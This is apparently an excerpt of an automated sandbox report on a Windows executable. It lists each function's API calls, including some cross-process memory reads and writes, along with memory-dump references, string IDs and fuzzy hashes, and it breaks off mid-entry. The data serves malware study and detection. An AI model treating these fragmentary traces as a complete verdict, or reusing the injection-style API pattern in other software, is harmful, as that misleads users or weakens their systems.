                                                                                • Instruction Fuzzy Hash: B0015B31C01929DBCF00ABE4DC596EDBBBABB09311F000546E542B2280CB75965287A1
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00631114
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631120
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 0063112F
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631136
                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0063114D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: 9bc3778b834324713a5e95101fe0410792e656c6d9ae0c057eeb6b05503bbd79
                                                                                • Instruction ID: a1ceec18a0659ac9dbae80482ab0b5a4fff31aa154ba769b6e71ef00b43bf378
                                                                                • Opcode Fuzzy Hash: 9bc3778b834324713a5e95101fe0410792e656c6d9ae0c057eeb6b05503bbd79
                                                                                • Instruction Fuzzy Hash: 00011975200605BFDB114FA5DC49AAA3F6FEF8A3A0B204419FA85D7360DA72DC009AA0
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00630FCA
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00630FD6
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00630FE5
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00630FEC
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00631002
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 2b559ef4c45ecba9f5bd50009bfcb987e52ae4c000f85ad7ba89d3d6aee9bd78
                                                                                • Instruction ID: 7e608253892b8b9ef80b627d3e4eeeb99541316b78a185a5035e1c7329ade96b
                                                                                • Opcode Fuzzy Hash: 2b559ef4c45ecba9f5bd50009bfcb987e52ae4c000f85ad7ba89d3d6aee9bd78
                                                                                • Instruction Fuzzy Hash: 7DF04F35100701BBD7214FA5DC49FA63B6EEF8A761F105414F985DA251CAB1DC408A60
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0063102A
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00631036
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631045
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0063104C
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631062
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: b647df0c4f572436bae5949653be69c4fbcc75a3bf0bccd63a07782b3b202ff5
                                                                                • Instruction ID: dddd22675b1bd879d20e333ee0a9c3319aeca6e3305c7581c6c915a98a4a6c88
                                                                                • Opcode Fuzzy Hash: b647df0c4f572436bae5949653be69c4fbcc75a3bf0bccd63a07782b3b202ff5
                                                                                • Instruction Fuzzy Hash: D8F04F35200705BBD7215FA5EC59FA63B6EEF8A761F101414F985DA250CAB1D8808A60
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640324
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640331
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 0064033E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 0064034B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640358
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640365
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 59bef1dddc637853fd2abfbaea283881a32b4d93fc45100a70713a5154292ff8
                                                                                • Instruction ID: 49dc10c82273be8be8e7356d83af3ee1148b72e9f2b88e09040ee61f1d4f6dfa
                                                                                • Opcode Fuzzy Hash: 59bef1dddc637853fd2abfbaea283881a32b4d93fc45100a70713a5154292ff8
                                                                                • Instruction Fuzzy Hash: DB01A276800B269FD7319F66D890452FBF6BF503153158A3FD29652A31C3B1A954CF80
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0060D752
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060D764
                                                                                • _free.LIBCMT ref: 0060D776
                                                                                • _free.LIBCMT ref: 0060D788
                                                                                • _free.LIBCMT ref: 0060D79A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 2a2a11a5f2f9827429a4c1f35d8194e5c1155f73d939b9617729bc6a1ec1f4b4
                                                                                • Instruction ID: 05ab167edcf3497fc886b38034afa4059867717ec6e29bebfd27b37465990094
                                                                                • Opcode Fuzzy Hash: 2a2a11a5f2f9827429a4c1f35d8194e5c1155f73d939b9617729bc6a1ec1f4b4
                                                                                • Instruction Fuzzy Hash: B9F0FF32584205ABC669EBA9F9D5C5B7BDFBF447207A41D0AF048E7A81C720FC8086A4
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00635C58
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00635C6F
                                                                                • MessageBeep.USER32(00000000), ref: 00635C87
                                                                                • KillTimer.USER32(?,0000040A), ref: 00635CA3
                                                                                • EndDialog.USER32(?,00000001), ref: 00635CBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 7b6e41a8e7fd6b97227d848f1a5c12021d0948b4e7c0f9c7dbd90cff4b2e39ff
                                                                                • Instruction ID: 95d3e755d365576dfc50604e9937251157e9b8e1a81d8373352930f09ffb6f9d
                                                                                • Opcode Fuzzy Hash: 7b6e41a8e7fd6b97227d848f1a5c12021d0948b4e7c0f9c7dbd90cff4b2e39ff
                                                                                • Instruction Fuzzy Hash: 0A018630500B04ABEB205B14DD4EFE67BBABB00B05F04255EE583A25E1DBF4A985CA95
                                                                                APIs
                                                                                • _free.LIBCMT ref: 006022BE
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 006022D0
                                                                                • _free.LIBCMT ref: 006022E3
                                                                                • _free.LIBCMT ref: 006022F4
                                                                                • _free.LIBCMT ref: 00602305
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 5cb6df4e494ee653b26aeb48f7dca00c07ba00b8137d955c845033c299fab7ec
                                                                                • Instruction ID: a85780b849411a168e9204d63e1f53a4b9656e4efb63f4ac64eefae43dbf628e
                                                                                • Opcode Fuzzy Hash: 5cb6df4e494ee653b26aeb48f7dca00c07ba00b8137d955c845033c299fab7ec
                                                                                • Instruction Fuzzy Hash: AAF030744901118FCB56BF65BC1595A3F6BBF1BB60B50290BF410D72F1C7306A519FA8
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 005E95D4
                                                                                • StrokeAndFillPath.GDI32(?,?,006271F7,00000000,?,?,?), ref: 005E95F0
                                                                                • SelectObject.GDI32(?,00000000), ref: 005E9603
                                                                                • DeleteObject.GDI32 ref: 005E9616
                                                                                • StrokePath.GDI32(?), ref: 005E9631
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: 3725ac777fc06b0552b2f9d4c42c935fc4103861c7d716434e0f0ef6839fa5cb
                                                                                • Instruction ID: 03df4aacfc50f14486d9076dcaa75d034fbfb4c981e2bb3111b73457793e2496
                                                                                • Opcode Fuzzy Hash: 3725ac777fc06b0552b2f9d4c42c935fc4103861c7d716434e0f0ef6839fa5cb
                                                                                • Instruction Fuzzy Hash: 0EF03C30005648EBDB166F66ED1C7763F62BB03372F04A215F4A5590F0C7719995DF60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$_free
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3432400110-3206640213
                                                                                • Opcode ID: 6fae9175de25deadc1985b062e9205aff4635f5785a80bf038460e6ae472fef5
                                                                                • Instruction ID: 28756b4388023eb09a5c907d0db8563f1b10d61d59028b128ddcdcb832a305f6
                                                                                • Opcode Fuzzy Hash: 6fae9175de25deadc1985b062e9205aff4635f5785a80bf038460e6ae472fef5
                                                                                • Instruction Fuzzy Hash: A5D1BD31980206DADB2C9F68C895AFBB7B6EF07300F28415AE9419F7D0D6759E81CB91
                                                                                APIs
                                                                                  • Part of subcall function 005F0242: EnterCriticalSection.KERNEL32(006A070C,006A1884,?,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F024D
                                                                                  • Part of subcall function 005F0242: LeaveCriticalSection.KERNEL32(006A070C,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F028A
                                                                                  • Part of subcall function 005F00A3: __onexit.LIBCMT ref: 005F00A9
                                                                                • __Init_thread_footer.LIBCMT ref: 00656238
                                                                                  • Part of subcall function 005F01F8: EnterCriticalSection.KERNEL32(006A070C,?,?,005E8747,006A2514), ref: 005F0202
                                                                                  • Part of subcall function 005F01F8: LeaveCriticalSection.KERNEL32(006A070C,?,005E8747,006A2514), ref: 005F0235
                                                                                  • Part of subcall function 0064359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006435E4
                                                                                  • Part of subcall function 0064359C: LoadStringW.USER32(006A2390,?,00000FFF,?), ref: 0064360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                • String ID: x#j$x#j$x#j
                                                                                • API String ID: 1072379062-3560744321
                                                                                • Opcode ID: f4a0b9dcf4e2eb1b38aca775466cadda88a944dba505188e878a87dce0f39f8b
                                                                                • Instruction ID: dcfea21cd3f899911ea7f88ff861d8df842fd9c9eb0d9f99aa97e122d433a0c2
                                                                                • Opcode Fuzzy Hash: f4a0b9dcf4e2eb1b38aca775466cadda88a944dba505188e878a87dce0f39f8b
                                                                                • Instruction Fuzzy Hash: 2CC15C71A00106ABCB14DF58C895EBEBBBAFF49300F54806AF9559B391DB70ED49CB90
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00608B6E
                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00608B7A
                                                                                • __dosmaperr.LIBCMT ref: 00608B81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                • String ID: ._
                                                                                • API String ID: 2434981716-1383207595
                                                                                • Opcode ID: c593f07f2b443e9fff84eef48ab7fbf0809afb5e39204a5368131a49a5dada0a
                                                                                • Instruction ID: 9ed32caa1fa4001788c02024e33bc3bb64fe9bb079577ecd043efd00a830cd8d
                                                                                • Opcode Fuzzy Hash: c593f07f2b443e9fff84eef48ab7fbf0809afb5e39204a5368131a49a5dada0a
                                                                                • Instruction Fuzzy Hash: A1415B70644155AFDB28DF24CC80ABF7FA7DB86314B2841A9F8C597692DF318C038B90
                                                                                APIs
                                                                                  • Part of subcall function 0063B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006321D0,?,?,00000034,00000800,?,00000034), ref: 0063B42D
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00632760
                                                                                  • Part of subcall function 0063B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0063B3F8
                                                                                  • Part of subcall function 0063B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0063B355
                                                                                  • Part of subcall function 0063B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00632194,00000034,?,?,00001004,00000000,00000000), ref: 0063B365
                                                                                  • Part of subcall function 0063B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00632194,00000034,?,?,00001004,00000000,00000000), ref: 0063B37B
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006327CD
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0063281A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: 97c426f32fb26edd6c8d789df498d52e1a6eb370a318295c5ec99d4a7f0d0743
                                                                                • Instruction ID: 2819f319e8fbcaa4c19fc2ba6ab796abc70b5016f5c841b521aeeb2643668446
                                                                                • Opcode Fuzzy Hash: 97c426f32fb26edd6c8d789df498d52e1a6eb370a318295c5ec99d4a7f0d0743
                                                                                • Instruction Fuzzy Hash: 30416D72900229BFDB10DFA4CC55AEEBBB9EF09300F105099FA55B7281DB706E45CBA0
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ofZiNLLKZU.exe,00000104), ref: 00601769
                                                                                • _free.LIBCMT ref: 00601834
                                                                                • _free.LIBCMT ref: 0060183E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                                • API String ID: 2506810119-2016568469
                                                                                • Opcode ID: bde434e478a1d9399ceb54f6a54cf10b2adbfc6d534eccee854d592460fce6c7
                                                                                • Instruction ID: 69e1ecb40d24d274b18bc7b3fc3e94b0a7f2351a5bb653cfec80a1aa3a313962
                                                                                • Opcode Fuzzy Hash: bde434e478a1d9399ceb54f6a54cf10b2adbfc6d534eccee854d592460fce6c7
                                                                                • Instruction Fuzzy Hash: 97317E75A80218ABDB25DF999885DDFBBBEEF86310F10416AE4049B291D6B09F40CB90
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0063C306
                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 0063C34C
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006A1990,01A3EF78), ref: 0063C395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem
                                                                                • String ID: 0
                                                                                • API String ID: 135850232-4108050209
                                                                                • Opcode ID: 621ac0ffd47e81cab52213e80b9fdefc4902e2ad60116f326ec3f91bc960ae3a
                                                                                • Instruction ID: ae433856271ba1b3141a7a3ec919f2ac94ac90e5e7b8343c3e9de553d51f3edb
                                                                                • Opcode Fuzzy Hash: 621ac0ffd47e81cab52213e80b9fdefc4902e2ad60116f326ec3f91bc960ae3a
                                                                                • Instruction Fuzzy Hash: A041B1712043019FE720DF24D884B6ABBE6AF85320F048A1EF9A5A73D1D770E904CB92
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0066CC08,00000000,?,?,?,?), ref: 006644AA
                                                                                • GetWindowLongW.USER32 ref: 006644C7
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006644D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: 31bc9587b0f8738a1a2a9b548f177e6e17cf9a6d95afa651500949e716fbfc28
                                                                                • Instruction ID: ed4d93406e56cec89521553109a8f79afcde986c28b3684376b0e793266bf4e7
